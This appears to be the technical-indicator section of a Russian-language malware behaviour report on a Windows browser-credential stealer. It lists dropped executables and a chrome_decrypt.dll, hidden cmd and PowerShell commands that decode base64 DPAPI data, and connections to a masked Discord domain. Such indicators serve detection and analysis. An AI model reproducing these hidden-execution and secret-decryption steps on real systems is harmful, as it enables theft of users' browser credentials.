Техническая информация
- msedge.exe
- %TEMP%\stub_1779321655754_uui9jmshs\payload.exe
- %TEMP%\elevator_1779321657990_y8w3dfsha\295elevator.exe
- %TEMP%\elevator_1779321657990_y8w3dfsha\chrome_decrypt.dll
- %TEMP%\stub_1779321655754_uui9jmshs\payload.exe
- 'di##ord.com':443
- 'di##ord.com':443
- DNS ASK di##ord.com
- '%TEMP%\stub_1779321655754_uui9jmshs\payload.exe'
- '%TEMP%\elevator_1779321657990_y8w3dfsha\295elevator.exe' all -o %TEMP%\elevator_1779321657990_y8w3dfsha\output
- '<SYSTEM32>\cmd.exe' /d /s /c ""%TEMP%\stub_1779321655754_uui9jmshs\payload.exe"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /d /s /c ""%TEMP%\elevator_1779321657990_y8w3dfsha\295elevator.exe" all -o %TEMP%\elevator_1779321657990_y8w3dfsha\output" (со скрытым окном)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe'
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -NoProfile -Command " $encData = [Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAARffMON4uAUOCSFoZ4fGQGhAAAAAKAAAARQBkAGcAZQAAABBmAAAAAQAAIAAAAO... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command " $encData = [Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAARffMON4uAUOCSFoZ4fGQGhAAAAAKAAAARQBkAGcAZQAAABBmAAAAAQAAIAAAAOkn5mGFWZ5eFpsDn35lPhg...